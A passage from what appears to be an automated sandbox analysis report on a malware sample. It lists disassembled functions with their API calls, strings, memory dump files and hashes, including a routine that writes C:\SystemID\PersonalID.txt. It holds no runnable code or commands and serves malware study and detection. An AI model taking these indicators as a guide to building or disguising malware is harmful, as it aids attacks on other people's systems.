                                                                                                                              • Part of subcall function 00485007: __amsg_exit.LIBCMT ref: 00485015
                                                                                                                            • __calloc_crt.LIBCMT ref: 00485A01
                                                                                                                              • Part of subcall function 00488C96: __calloc_impl.LIBCMT ref: 00488CA5
                                                                                                                            • __lock.LIBCMT ref: 00485A37
                                                                                                                            • ___addlocaleref.LIBCMT ref: 00485A43
                                                                                                                            • __lock.LIBCMT ref: 00485A57
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2580527540-0
                                                                                                                            • Opcode ID: 2f1ec670d5727ff548269b68469d1bd3144554eae5affa144dec9287f7bc632e
                                                                                                                            • Instruction ID: 4f10bcbaa1a994ba95705a3ca5f9901736cc9a6652770eb57c27fddcf34c7cfb
                                                                                                                            • Opcode Fuzzy Hash: 2f1ec670d5727ff548269b68469d1bd3144554eae5affa144dec9287f7bc632e
                                                                                                                            • Instruction Fuzzy Hash: 6E014071541701EBD724FFAA8442B1D7BE0AF85728F604A4FF4559B2C2CE7C49418B69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004A09B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                            • Instruction ID: d5fb4a527ae2fd50d63a95ec52629ce4902c0be0efde536435da304a19ad4a91
                                                                                                                            • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                            • Instruction Fuzzy Hash: 1F01407640024EBFCF125E85CC428EE3F66BB3E354F588416FE1958131C23AC9B2AB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004727A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32 ref: 004727B9
                                                                                                                            • _malloc.LIBCMT ref: 004727C3
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A30000,00000000,00000001,00000001,?,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480CA5
                                                                                                                            • _memset.LIBCMT ref: 004727CE
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004727E4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2824100046-0
                                                                                                                            • Opcode ID: ba6c40985c3acdcca34163e2616274c5fa1b84f182fbba384ba462272f2e5998
                                                                                                                            • Instruction ID: cb95aba7358274ad346eb336a2b2e70f431ca86fbd866e0a79358e66e078d918
                                                                                                                            • Opcode Fuzzy Hash: ba6c40985c3acdcca34163e2616274c5fa1b84f182fbba384ba462272f2e5998
                                                                                                                            • Instruction Fuzzy Hash: EAF02735701204BBE72066659C4FFBF7A9DDF86764F100129B604E32D2EA512D0552F5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32 ref: 00472806
                                                                                                                            • _malloc.LIBCMT ref: 00472814
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A30000,00000000,00000001,00000001,?,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480CA5
                                                                                                                            • _memset.LIBCMT ref: 0047281F
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00472832
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2824100046-0
                                                                                                                            • Opcode ID: 61c08ecc5b938af7da828bfe379d8873654ffa06736869913326384ce959dba2
                                                                                                                            • Instruction ID: 2dff85dbc8a1f8c10c09fa7dd81d56327f55088363b63b2bbc057ff0a88b59cc
                                                                                                                            • Opcode Fuzzy Hash: 61c08ecc5b938af7da828bfe379d8873654ffa06736869913326384ce959dba2
                                                                                                                            • Instruction Fuzzy Hash: 94E086763015247BE520235A6C4FFAF6A1CCFC37A5F100516F611D22E38A941C0692B4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00474920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: a13d250b8e4f8c338575a67e356c4616ff6c48b5b372c969a719baa9f4740b98
                                                                                                                            • Instruction ID: 9f3977e2a26e072fbcdeefb61b6b3eff430cb5414efe151019f6d2d6ee6dad43
                                                                                                                            • Opcode Fuzzy Hash: a13d250b8e4f8c338575a67e356c4616ff6c48b5b372c969a719baa9f4740b98
                                                                                                                            • Instruction Fuzzy Hash: 12C12B70700619DBCB24CF58D9C09BAB3B6FFC5304B20852EE44A8B655DB34ED56CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004D0040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                            • API String ID: 2102423945-2878120539
                                                                                                                            • Opcode ID: 2a391f156b25c580378a226487fa195cb3d1526972ef050fc947c6413cb33bcd
                                                                                                                            • Instruction ID: eeb9d5d5533edaf5c1500102944b847ae9b332e90221a262bb14c3de1cd8eedd
                                                                                                                            • Opcode Fuzzy Hash: 2a391f156b25c580378a226487fa195cb3d1526972ef050fc947c6413cb33bcd
                                                                                                                            • Instruction Fuzzy Hash: 4051C67174030536E7316AA6BC92F6B7B98DF42B55F08042FFA0497382EA9DE9448179
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00477D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 67ba2ce28321db85ed1a0b081f5b80108b1c30bb656a3e63d5a9f161ca98fb87
                                                                                                                            • Instruction ID: 1c78b780bf9a620a29811a304f661095fe958588e7493dd73cd188f86a60d4d1
                                                                                                                            • Opcode Fuzzy Hash: 67ba2ce28321db85ed1a0b081f5b80108b1c30bb656a3e63d5a9f161ca98fb87
                                                                                                                            • Instruction Fuzzy Hash: 4F5180316042099BCF24DF18C9808EA77A6FF85304BA0896EE8598B351D735ED558BE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0048A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0048AB93
                                                                                                                            • ___raise_securityfailure.LIBCMT ref: 0048AC7A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                            • String ID: 8W
                                                                                                                            • API String ID: 3761405300-2509821728
                                                                                                                            • Opcode ID: 64ee1a73df179552024213226afbd529194318e49cc028ce25e78e5543d8b6fa
                                                                                                                            • Instruction ID: 3132e605912e133f82f1ca4996622d756ba7569dcf55d633a52aded3e3d8f047
                                                                                                                            • Opcode Fuzzy Hash: 64ee1a73df179552024213226afbd529194318e49cc028ce25e78e5543d8b6fa
                                                                                                                            • Instruction Fuzzy Hash: AD21C4B5510304DBD7A0DF55F9956047BE8AB68350F10682AE90C8B6E0E2F169C8FF46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00473C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00473CA0
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            • _memset.LIBCMT ref: 00473C83
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1327501947-3788999226
                                                                                                                            • Opcode ID: f7d2e19225786e87967da67c4c9be23d748577fecf949c5b117d6a6f1f0f3940
                                                                                                                            • Instruction ID: 18db1ced95fd6284bd47f09f23934aa2aa0b6eaefcaec78b6cf6294e361dcb85
                                                                                                                            • Opcode Fuzzy Hash: f7d2e19225786e87967da67c4c9be23d748577fecf949c5b117d6a6f1f0f3940
                                                                                                                            • Instruction Fuzzy Hash: 1B01D2F25003005BE330AF1AD801797B6E8AF50B25F10882EE99893781E7B9E944C799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fputws$CreateDirectory
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            • API String ID: 2590308727-54166481
                                                                                                                            • Opcode ID: 52dfd52ec6dccd7b26a521a85387eee086d43adec105b3d8314f36f745a24cbf
                                                                                                                            • Instruction ID: c247d106844b85cc5bc76bc46d1f7014939a6aa7cfc9f9ce621274da3ce56af5
                                                                                                                            • Opcode Fuzzy Hash: 52dfd52ec6dccd7b26a521a85387eee086d43adec105b3d8314f36f745a24cbf
                                                                                                                            • Instruction Fuzzy Hash: A711D072940305ABDF20DF659C963AF76A0AF10718F00092BEC9952241F37A99288BCB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00480DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Assertion failed: %s, file %s, line %d, xrefs: 00480E13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __calloc_crt
                                                                                                                            • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                            • API String ID: 3494438863-969893948
                                                                                                                            • Opcode ID: 7e96d92ab9b0e5b8d8536881606d6573401ff37f1113f15ecbc2acd102612bd3
                                                                                                                            • Instruction ID: 56458dbef24f1e0e856a31aa98b2792af362259b99e0ebbf0fc7365f9e70331c
                                                                                                                            • Opcode Fuzzy Hash: 7e96d92ab9b0e5b8d8536881606d6573401ff37f1113f15ecbc2acd102612bd3
                                                                                                                            • Instruction Fuzzy Hash: 0FF0A47131A2118BF764BB76BC11A6E37D4B721724F100C2FF600EA680EB3C9849579A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004E0620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004E0686
                                                                                                                              • Part of subcall function 004B4C00: _raise.LIBCMT ref: 004B4C18
                                                                                                                            Strings
                                                                                                                            • .\crypto\evp\digest.c, xrefs: 004E0638
                                                                                                                            • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 004E062E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset_raise
                                                                                                                            • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                            • API String ID: 1484197835-3867593797
                                                                                                                            • Opcode ID: 7e1c663466d9bdaf2276e8cd8f13db5fa4a11c6109014f03b63f8c04876246d7
                                                                                                                            • Instruction ID: 06d27f4caf493e386d9ba8b0ad95f11089463cba8687677dd14eb3348537f226
